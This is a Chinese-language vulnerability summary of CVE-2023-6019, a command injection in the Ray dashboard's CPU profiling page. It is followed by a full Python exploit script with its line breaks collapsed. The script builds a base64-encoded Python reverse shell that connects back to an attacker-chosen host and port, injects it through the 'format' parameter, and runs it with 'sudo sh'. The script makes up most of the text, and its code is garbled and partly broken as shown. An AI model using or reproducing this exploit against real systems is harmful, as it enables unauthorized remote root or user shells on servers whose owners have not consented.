Ray OS v2.6.3 版本的 CPU 性能分析页面存在一个命令注入漏洞，攻击者可以通过该漏洞执行任意命令。如果系统配置允许无密码 sudo（某些 Ray 配置要求），攻击者可以获得 root 权限。否则，攻击者将获得用户级 shell。该漏洞影响 Ray OS v2.6.3 及以下版本，攻击者可以通过构造恶意请求，利用该漏洞获取系统控制权。

🎯 该漏洞利用了 Ray OS v2.6.3 及以下版本中 CPU 性能分析页面的 `format` 参数未进行验证，攻击者可以在该参数中注入恶意命令。

💻 攻击者可以通过构造恶意请求，在 `format` 参数中注入 base64 编码后的 shell 命令，并利用系统命令执行功能，最终获取系统控制权。

🛡️ 该漏洞的修复需要对 `format` 参数进行严格的验证，防止恶意命令注入。同时，建议用户禁用无密码 sudo 功能，以提高系统安全性。

🚀 为了防止该漏洞被利用，建议用户及时更新到最新版本或使用其他安全措施，例如禁用 CPU 性能分析功能或使用安全软件进行防护。

⚠️ 该漏洞的利用需要攻击者具有访问 Ray OS 服务器的权限，攻击者可以通过网络攻击或社会工程学等方式获取该权限。

Exploit Title: Ray OS v2.6.3 - Command Injection RCE(Unauthorized)# Description:# The Ray Project dashboard contains a CPU profiling page, and the format parameter is# not validated before being inserted into a system command executed in a shell, allowing# for arbitrary command execution. If the system is configured to allow passwordless sudo# (a setup some Ray configurations require) this will result in a root shell being returned# to the user. If not configured, a user level shell will be returned# Version: <= 2.6.3# Date: 2024-4-10# Exploit Author: Fire_Wolf# Tested on: Ubuntu 20.04.6 LTS# Vendor Homepage: https://www.ray.io/# Software Link: https://github.com/ray-project/ray# CVE: CVE-2023-6019# Refer: https://huntr.com/bounties/d0290f3c-b302-4161-89f2-c13bb28b4cfe# ==========================================================================================# !usr/bin/python3# coding=utf-8import base64import argparseimport requestsimport urllib3proxies = {"http": "127.0.0.1:8080"}headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"}def check_url(target, port):target_url = target + ":" + porthttps = 0if 'http' not in target:try:urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)test_url = 'http://' + target_urlresponse = requests.get(url=test_url, headers=headers, verify=False, timeout=3)if response.status_code != 200:is_https = 0return is_httpsexcept Exception as e:print("ERROR! The Exception is:" + format(e))if https == 1:return "https://" + target_urlelse:return "http://" + target_urldef exp(target,ip,lhost, lport):payload = 'python3 -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("' + lhost + '",' + lport + '));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")\''print("[]Payload is: " + payload)b64_payload = base64.b64encode(payload.encode())print("[]Base64 encoding payload is: " + b64_payload.decode())exp_url = target + '/worker/cpu_profile?pid=3354&ip=' + str(ip) + '&duration=5&native=0&format=echo ' + b64_payload.decode() + ' |base64$IFS-d|sudo%20sh'# response = requests.get(url=exp_url, headers=headers, verify=False, timeout=3, prxoy=proxiess)print(exp_url)urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)response = requests.get(url=exp_url, headers=headers, verify=False)if response.status_code == 200:print("[-]ERROR: Exploit Failed,please check the payload.")else:print("[+]Exploit is finished,please check your machine!")if name == 'main':parser = argparse.ArgumentParser(description='''⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⡠⠄⡄⡄⡠⡀⣀⡀⢒⠄⡔⡄⢒⠄⢒⠄⣀⡀⣖⡂⡔⡄⢴⠄⣖⡆⠄⠄⡤⡀⡄⡄⠑⠂⠘⠄⠙⠂⠄⠄⠓⠂⠑⠁⠓⠂⠒⠁⠄⠄⠓⠃⠑⠁⠚⠂⠒⠃⠐⠄⠗⠁⠬⠃⢰⣱⢠⢠⠠⡦⢸⢄⢀⢄⢠⡠⠄⠄⢸⠍⠠⡅⢠⡠⢀⢄⠄⠄⢸⣸⢀⢄⠈⡇⠠⡯⠄⠘⠘⠈⠚⠄⠓⠘⠘⠈⠊⠘⠄⠄⠁⠘⠄⠐⠓⠘⠄⠈⠓⠠⠤⠘⠙⠈⠊⠐⠓⠄⠃⠄⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄''',formatter_class=argparse.RawDescriptionHelpFormatter,)parser.add_argument('-t', '--target', type=str, required=True, help='tart ip')parser.add_argument('-p', '--port', type=str, default=80, required=False, help='tart host port')parser.add_argument('-L', '--lhost', type=str, required=True, help='listening host ip')parser.add_argument('-P', '--lport', type=str, default=80, required=False, help='listening port')args = parser.parse_args()# target = args.targetip = args.target# port = args.port# lhost = args.lhost# lport = args.lporttargeturl = check_url(args.target, args.port)print(targeturl)print("[*] Checking in url: " + targeturl)exp(targeturl, ip, args.lhost, args.lport)